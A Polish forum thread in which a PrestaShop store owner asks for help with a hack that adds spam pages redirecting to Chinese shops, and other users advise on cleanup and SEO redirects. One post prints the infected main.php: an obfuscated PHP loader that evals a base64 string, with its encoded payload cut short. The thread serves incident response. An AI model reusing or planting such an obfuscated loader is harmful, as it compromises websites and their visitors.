Dziwne przekierowania

[crew123]

Witam wszystkich na forum. Jestem tutaj nowy i jak do tej pory wystarczało mi czytanie pomocnych artykułów.

Od pół roku posiadam sklep oparty na presta i sam działam tak sobie w nim.

Obserwuję też stan zaindeksowania moich stron w google.

I jak dotychczas rosło to sobie powoli w miarę dodawania produktów, aż nagle dzisiaj dwa razy wiecej stron. Przechodzę po podstronach wyszukiwania , aż po 18-19 stronie, moja domena z dodatkami typu: main.php?goods5-pageinfo-10110.htm

przekierowuje na jakieś chińskie strony sprzedażowe. Tych stron jest mnóstwo. 

Co robić??? Jak znaleźć skrypt atakujący???

((((

HELP.

PS. Za komentarze "poszukaj specjalisty" i piętnujący moją amatorszczyznę z góry podziękuję.

[() Maciej ()]

Przede wszystkim jaka wersja sklepu ? Jaki serwer ?

 

Wszystko to co opisujesz wygląda jak infekcja wirusem, który dostał się prawdopodobnie poprzez nie aktualizowane moduły, prestę lub starą dziurawą wersję np. PHPa.

[crew123]

PRESTA 1.6.1.13 

Serwer: linuxpl.com

 

Wyczaiłem, że zainfekowany jest plika main.php (nie wiem, czy wogóle powinien znajdowac się taki plik w katalogu public_html.

Jego treśc to:

<?php // This file is protected by copyright law & provided under license. Copyright© 2005-2009 www.vidun.com, All rights reserved.

$OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');$OO00O0000=15080;$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('JE9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PME8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzAwMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwMHsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMjYyKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPTzBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDM4MCksJ0VudGVyeW91d2toUkhZS05XT1VUQWFCYkNjRGRGZkdnSWlKakxsTW1QcFFxU3NWdlh4WnowMTIzNDU2Nzg5Ky89JywnQUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZhbCgkT08wME8wME8wKTs=')));return;?>

kr9NHenNHenNHe1zfukgFMaXdoyjcUImb19oUAxyb18mRtwmwJ4LT09NHr8XTzEXRJwmwJXPkr9NTzEXHenNHtILT08XT08XHr8XhtONTznNTzEXHr8Pkr8XHenNHr8XHtXLT08XHr8XHeEXhUXmOB50cbk5d3a3D2iUUylRTlfNaaOnCAkJW2YrcrcMO2fkDApQToxYdanXAbyTF1c2BuiDGjExHjH0YTC3Ke.... długi ciąg znaków

 

Najpierw zmieniłem mu nazwę, potem uprawnienia na 0 i strony zaindeksowane już nie przekierowują.

Myślę, że masz rację prestę zaktualizowałem dopiero dzisiaj.

Mam nadzieję, że problem nie będzie się powtarzał.

[endriu107]

To może nie być jedyny zainfekowany plik, pliki mogą się kryć w różnych folderach a kod może być również doklejony do standardowych plików i przypomni się za pare dni. Poproś linuxpl o skanowanie plików jeśli coś znajdą powinieneś otrzymać listę plików. Pobierz czystą paczkę swojej wersji presty i porównaj te pliki jeśli są różnice to nadpisz pliki. Oczywiście aktualizacja modułów będzie niezbędna. Nie napisałeś czy masz dodatkowe moduły i z jakiego szablobu korzystasz a być może dziura została załatana a ty przeoczyłeś informacje o tym.

[() Maciej ()]

Skanowanie nic nie wykaże. Przerabiałem to już

 

Jak masz 1 taki plik to masz ich bankowo więcej.

Na linuxpl jest super sprawa, bo możesz poprosić admina o log zmian w plikach na Twoim koncie i lecisz wszystkie pliki zmienione. Nie ma sensu porównywać plików wtedy.

 

Wirus jak pisał kolega wyżej doklejany jest do wszystkiego do czego się da. Rozpoczyna się zawsze od <?php i nie ma tagu zamknięcia. Potem masz ponownie otwarcie <?php i leci dalej kod prawidłowy danego pliku.

 

Nie sugeruj się tylko czasem kiedy się zaczęły dziać dziwne rzeczy. Bo pliki mogą być zmodyfikowane np 3-4 miesiące wcześniej i dopiero po jakimś czasie się uaktywniają

Edited May 16, 2017 by () Maciej () (see edit history)

[crew123]

Administrator Linuxpl.com odpowiedział, że skaner nie wykrył wirusów, ale wskazali mi pliki w preście z ostrzeżeniami. I są to pliki (6szt), które posiadają kod taki jak wkleiłem wyżej.

Czy jest ktoś w stanie mi sprawdzić/powiedzieć, czy w posiadacie w swojej instalacji pliki main.php  i temp.php w katalogu public_html, oraz  katalog public_html/abcdef/data z plikiem map.php ????

[() Maciej ()]

Nie ma takich plików, chyba że z jakiegoś modułu albo dodatku pisanego pod Ciebie.

Zgraj je na swojego kompa i usuń z FTPa.. Sprawdź czy wszystko działa i masz pewność 100%, że już jest ok.

[crew123]

Tak zrobiłem, wszystko działa jak nalezy, choć nie wiem czy to koniec:(

Teraz pewnie google będzie się darło o linki do nieistniejących stron, ale co mi tam:)

[crew123]

A może ktoś podpowie co zrobić teraz, żeby w google nie stracić. Po wejściu na link zaindeksowany w google otwiera sie teraz moja strona sklepu z:

STRONA NIEDOSTĘPNA

NIESTETY, PODANY PRZEZ CIEBIE ADRES STRONY NIE JEST DOSTĘPNY.

Aby wyszukać produkt wpisz jego nazwę w polu poniżej

 

jakieś przekierowania? ale tych stron jest mnostwo.

[() Maciej ()]

Można by się pobawić w pliku httaccess i przekierować z niego ruch z tych zagranicznych linków na stronę główną.

Choć nie wiem czy to wtedy nie będzie przez google uwzględnione jako próba oszustwa i strona poleci daleko w dół w wynikach.

[Piotr K.]

Możesz zrobić przekierowanie na główna lub którąś podstronę.

Natomiast jeśli nie skasowałeś wszystkiego i nie zlikwidowałeś przyczyny to za chwilę będzie powtórka z rozrywki